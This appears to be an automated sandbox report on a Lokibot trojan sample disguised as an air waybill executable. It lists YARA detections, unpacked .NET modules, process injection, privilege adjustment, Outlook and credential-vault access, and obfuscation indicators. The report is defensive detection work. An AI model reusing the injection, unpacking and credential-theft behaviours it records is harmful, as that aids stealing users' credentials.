Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, StL8WvaNclbdmwJqfH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, StL8WvaNclbdmwJqfH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.cs	Security API names: _0020.AddAccessRule

Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7b70000.10.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.3126898.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.33482b8.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.31164f8.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/8@0/1

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

3_2_0040650A

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Code function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

3_2_0040434D

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5516

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3c265893-1c16-49b6-8ac8-aac60de7ee2b

Jump to behavior

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 1376
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mscorlib.pdbMZ source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Data.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Xml.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: Accessibility.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: UHN.pdbO source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Data.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Configuration.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: UHN.pdbSHA256Q source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Source:	Binary string: System.Xml.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: UHN.pdb source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Drawing.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb< source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Data.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: Accessibility.pdbMZ source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Data.pdb, source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.cs	.Net Code: aUKg2Ju9Kb System.Reflection.Assembly.Load(byte[])
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.cs	.Net Code: aUKg2Ju9Kb System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536, type: MEMORYSTR

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: 0xC420D92E [Mon Apr 9 08:11:26 2074 UTC]

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_0568B038 push 00000005h; ret	0_2_0568B050
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 0_2_07C93E3A push ds; ret	0_2_07C93E3B
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AD4
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AFC

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: section name: .text entropy: 7.93845583971947

Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.cs	High entropy of concatenated method names: 'qIQMTpWrWt', 'hcqML81XaH', 'OHeMxPBRjO', 'HC8MEUhXJb', 'U0rM3gUcHF', 'HjoMHPGaKa', 'MZHMBotVbE', 'VREMkaXNu0', 'SnIMKHuy6H', 'TyFMl2oYfd'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, SuAEeQc8I3vT7aTCms.cs	High entropy of concatenated method names: 'b1pB4oNlyq', 'voFBCdqliQ', 'KiaB22MBg0', 'm2HB0tGwy5', 'vi6Bmh3kJh', 'RQyBODOPOB', 'jt5BDWbvIP', 'dxWBaTdQIL', 'XbgB9tT2gq', 'SFBB8hgjtk'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, TTQH6QxdPXeNjJNoSn.cs	High entropy of concatenated method names: 'Dispose', 'sSXub5IFax', 'SWDhslUISZ', 'GiE33XVdcK', 'D8iuJJ0DND', 'PJluzX1dFB', 'ProcessDialogKey', 'gfohvaBhcw', 'VZvhuAC3Ji', 'pEBhhZrvj5'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, J1AubU8Cj2WQPf1o7M.cs	High entropy of concatenated method names: 'Vl93ms0S6n', 'aPT3Dqe5ht', 'tKhEWIKyPi', 'xiaESjU2Cy', 'K42E6B1X7h', 'E7OEtEuVb8', 'BFJEpMLfiv', 'agTEdd3c7i', 'icjEcRNyMQ', 'HFdEYOs9kH'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, RneVnmja3TaUfmP2sr.cs	High entropy of concatenated method names: 'nq8Nl2R5nn', 'oAQNydbvKq', 'ToString', 'rRWNL8YTjg', 'Ts3NxX2UlA', 'eOxNECyR4r', 'o2PN39lPaH', 'MrDNHmlh8D', 'mgUNBj7sJa', 'oITNkwRlt7'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, Oj8WJmh7ZwG5taFvHE.cs	High entropy of concatenated method names: 'heN2tuJDL', 'lB307JD4b', 'dR2OwKSmJ', 'niJD0ObYo', 'SBl9Xtakm', 'fgn8Sgkls', 'xZkMDugGbokLcgaXYL', 'Rar5aJyDhu0kF3tTvZ', 'vn0ejLauS', 'HFiGjZL8K'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, FiJ0DNQD5JlX1dFBEf.cs	High entropy of concatenated method names: 'zRBeL2qN6m', 'YudexvSjQb', 'aebeEw6QOv', 'GO0e39lt9V', 'cSMeHVpE7G', 'U9yeB4GAHo', 'I7mekKtU9n', 'qhneK16VX7', 'f5oelOIFjO', 'vsdeyBDhEI'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, B9Op3HRAQghurniPAZ.cs	High entropy of concatenated method names: 'eQlVahW75o', 'jBLV9sLY1M', 'EtTVZ7DGdk', 'LljVs5sR2A', 'w2wVSXMFjl', 'wC4V6vXx2k', 'LeDVp7Agaa', 'JX7VdnvwRs', 'YLmVYY6SSB', 'BBMVUGnLkq'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xQkALIzXG59GrjeogD.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fjYIV4hatZ', 'NKuIXo1GnY', 'fgRIFKabMM', 'NhIINNpDfe', 'MBVIeU9j0d', 'v5dIIcle81', 'SnxIGMUAj4'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, kLxMMAw7KmIH5Fx1oS.cs	High entropy of concatenated method names: 'ToString', 'zUDFUhlJ3r', 'MXiFs0hUZv', 'qOsFWANpMB', 'MveFShg9ui', 'qFGF6yBMIj', 'uB5FtIJErW', 'ic4FpgcjjE', 'tykFdJCfvb', 'zldFcdiSrl'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, Nx7spOZFc8C3EVoR0m.cs	High entropy of concatenated method names: 'jX4HT0aqKm', 'Xk8HxnZcLw', 'm5eH3qZTwh', 'ChqHBHhm2U', 'yLLHkHYOHO', 'OZO3o4lYC6', 'xSG3fYGZiY', 'oso3rNA0Gg', 'M1q3Quo2RI', 'Ayc3b3WUla'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, sCSDUluMB1aWn7VZ9rF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jIHGPMdJM2', 'NJ2GAQNYOB', 'sOnGwwRqLZ', 'FVuGjV5bTH', 'Xu7Go4J3Ka', 'TD3Gf1HS0N', 'f0sGrY6IgX'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, NCRonW9CNF9QtoUBCa.cs	High entropy of concatenated method names: 'omOE0tgJRG', 'aArEObQPiN', 'xoaEawhlN1', 'GQpE9irjsf', 'HZdEXxwpRt', 'TJwEFcmvyp', 'QMZEN8BZjF', 'xQhEeVeXwd', 'VcPEI6BCRV', 'IPfEGe7Esq'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xDtpkpElYJ2Ai095nL.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'a8Nhbe92tc', 'OdDhJOuiL7', 'acNhzBN90N', 'd7yMv7Jjwm', 'MLvMue93ny', 'rQwMhBwShV', 'mT4MMeqoSj', 'UpmXjiFRd5oTueylsqI'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, j7jAn3fLnEhc2oUuwj.cs	High entropy of concatenated method names: 'GtYNQ04RBF', 'X3DNJjZ4fn', 'zeeev67Q3r', 'u9XeuhMZSX', 'aG4NU2bffW', 'q7HN5q31HM', 'fkyNRnYfga', 'vLFNPqibUp', 'zPlNA2yjBT', 'lG2NwVYtEb'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, UaBhcwbrZvAC3JiFEB.cs	High entropy of concatenated method names: 'SCueZpb5WD', 'vPheshmXVg', 'DrkeWUYcn5', 'kaaeSMkScS', 'BW9eP3Yj0o', 'mEde6LbGAl', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, PaRybap7lJOiB4GDgn.cs	High entropy of concatenated method names: 'krdBLtBdwP', 'farBE0YfeV', 'rZWBHgaYwm', 'Oy3HJeKwPv', 'jDkHzIMET6', 'm2JBvJDEpR', 'Q0QBukFaPF', 'PB2BhlcyN3', 'qbJBMrgS22', 'nENBgqN8sO'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, Grvj5UJhfZRvk38vCF.cs	High entropy of concatenated method names: 'B9mIuyhu7y', 'qxMIMtDTUo', 'fHeIgruJk0', 'iChILbtYCn', 'kD0Ixf7ElJ', 'SrTI3bXnfX', 'amsIHsWqSp', 'hsperAmsMw', 'CiTeQtrm57', 'bdfebXM7RU'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, StL8WvaNclbdmwJqfH.cs	High entropy of concatenated method names: 'JWixP7ReaT', 'B4fxAdXHXq', 'o0dxwKY2Gt', 'q6KxjV1P4y', 'pffxoNywcP', 'erNxfEmGHg', 'nXqxreKDg3', 'VkZxQPQBep', 'TnUxbFH92S', 'ratxJ5cxrO'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, rpOlCkPe18lFvoF12b.cs	High entropy of concatenated method names: 'lUnXYUo3YS', 'mUWX5C0fmS', 'mnOXPXxD2x', 'SpUXAgp70V', 'bGxXs2RRUP', 'gu3XW3opM9', 'AQpXSJGQWR', 'wN2X6thMn8', 'ztiXtN2ZLQ', 'YygXpLJQDp'
